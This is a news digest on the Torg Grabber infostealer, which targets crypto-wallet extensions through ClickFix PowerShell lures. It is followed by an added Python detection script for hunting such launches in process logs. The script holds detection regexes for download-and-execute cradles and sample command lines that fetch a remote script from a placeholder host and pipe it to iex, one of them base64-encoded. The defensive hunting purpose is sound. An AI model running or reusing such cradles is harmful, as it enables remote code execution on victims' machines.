New Torg Grabber Infostealer Malware Targets 728 Crypto Wallets

BleepingComputer, Mar 25, 2026

Why It Matters

The threat shows how cybercriminals are targeting the growing crypto-asset ecosystem and the high-value credential stores kept in browsers, raising the risk for both individual investors and enterprises whose users rely on browser-extension wallets. Its evasion tactics make detection and remediation harder for security teams.

Key Takeaways

  • Targets 728 crypto wallet browser extensions.
  • Harvests data from 850 total browser extensions.
  • Uses ClickFix clipboard hijack for PowerShell execution.
  • Switches to HTTPS via Cloudflare for C2 traffic.
  • Bypasses Chrome's App-Bound Encryption to steal cookies.

Pulse Analysis

The emergence of Torg Grabber underscores a broader shift in cybercrime toward high‑value, niche targets such as cryptocurrency wallets. While traditional ransomware still dominates headlines, attackers are now weaponizing infostealers that silently siphon private keys, seed phrases, and authentication tokens directly from the browsers users trust for daily transactions. This trend reflects the growing financial incentive of crypto theft, where a single compromised wallet can contain assets worth millions, prompting threat actors to refine their tools for maximum yield.

Technically, Torg Grabber shows a layered evolution in delivery, command and control, and credential theft. Early builds used Telegram as the C2 channel; the latest builds have moved to HTTPS behind Cloudflare, which blends the traffic into ordinary web activity and complicates network-based detection. The ClickFix lure hijacks the clipboard so that the victim pastes and runs a PowerShell command themselves, which sidesteps controls focused on malicious attachments and downloads because the execution is user-initiated. The stealer also bypasses Chrome's App-Bound Encryption, the mechanism meant to restrict cookie decryption to the Chrome process, and uses reflective DLL injection via the Underground tool to extract the master encryption keys, letting it decrypt stored credentials in memory. Combined with multi-layered obfuscation and in-memory execution, these capabilities blunt static analysis and call for behavioral monitoring.

For organizations, the implications are twofold. First, browser extensions need governance: inventory them, enforce an allow list, and apply strict policy to crypto-related add-ons. Second, endpoint detection and response (EDR) should be supplemented with PowerShell auditing (Script Block Logging, Event ID 4104, and process-creation logging that captures command lines), with particular attention to PowerShell spawned from the Run dialog or a browser, since that is the ClickFix execution path, and with clipboard monitoring where it is feasible. Keeping browsers current, using hardware-backed MFA, and segmenting high-risk workstations further reduce exposure. Because Torg Grabber adds C2 domains weekly, defenders need continuous threat-intel feeds and proactive hunting for its indicators of compromise rather than static block lists.
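The PowerShell auditing recommended above can be turned into a concrete hunt. The following is an added example, not code from the BleepingComputer article or from Torg Grabber itself: it scores process-creation records for the hallmarks of a ClickFix cradle (PowerShell spawned by explorer.exe, hidden window, policy bypass, an encoded command, and a download-and-execute pattern). The field names follow Sysmon Event ID 1 / Security 4688 naming, the weights are an assumption chosen for the example, and the telemetry records, host names and URL are constructed here and are not indicators from the article.

```python
"""Hunt for ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not code from the BleepingComputer article or from Torg Grabber.
Input records are constructed below; field names (ParentImage, Image,
CommandLine) follow Sysmon Event ID 1 / Security 4688 naming as an assumption.
"""
import base64
import re

# Hallmarks of a ClickFix cradle: hidden window, policy/profile bypass,
# download-and-execute, a remote URL, and an -EncodedCommand blob.
HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)
CRADLE = re.compile(
    r"\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression"
    r"|downloadstring|net\.webclient|start-bitstransfer)\b", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event):
    """Score one process-creation record; returns (score, reasons).

    Weights are an assumption for this example, not a vendor rule set.
    """
    reasons = []
    score = 0
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    # ClickFix lures have the victim paste into Win+R, so the shell's parent
    # is explorer.exe rather than a terminal, IDE or scheduled task.
    if parent == "explorer.exe":
        score += 3
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded  # scan both the raw and the decoded command
    if decoded:
        score += 2
        reasons.append("encoded command decoded")
    if HIDDEN.search(text):
        score += 2
        reasons.append("hidden window")
    if BYPASS.search(text):
        score += 1
        reasons.append("execution policy / profile bypass")
    if CRADLE.search(text):
        score += 3
        reasons.append("download-and-execute cradle")
    if URL.search(text):
        score += 1
        reasons.append("remote URL in command")
    return score, reasons


# Constructed telemetry: hosts, paths and the URL are invented for this
# example and are not indicators of compromise from the article.
_PAYLOAD = "iwr http://updates.example.invalid/fix.ps1 -UseBasicParsing | iex"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"host": "ws01", "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell -w hidden -nop -ep bypass -c "' + _PAYLOAD + '"'},
    {"host": "ws02", "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell -WindowStyle Hidden -EncodedCommand " + _B64},
    {"host": "srv01", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": _PS,
     "CommandLine": r"powershell -File C:\ops\rotate-logs.ps1"},
    {"host": "ws03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]


def hunt(events, threshold=6):
    """Return (host, score, reasons) for every event at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["host"], score, reasons))
    return hits


if __name__ == "__main__":
    for host, score, reasons in hunt(SAMPLE_EVENTS):
        print(f"{host}: score {score} -> {', '.join(reasons)}")
```

Decoding the `-EncodedCommand` blob before matching matters: the raw command line of the second record contains no cradle keywords at all, and a rule that only inspects the visible arguments would miss it. The explorer.exe parent is the strongest single signal because legitimate administration almost never launches PowerShell from the Run dialog.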
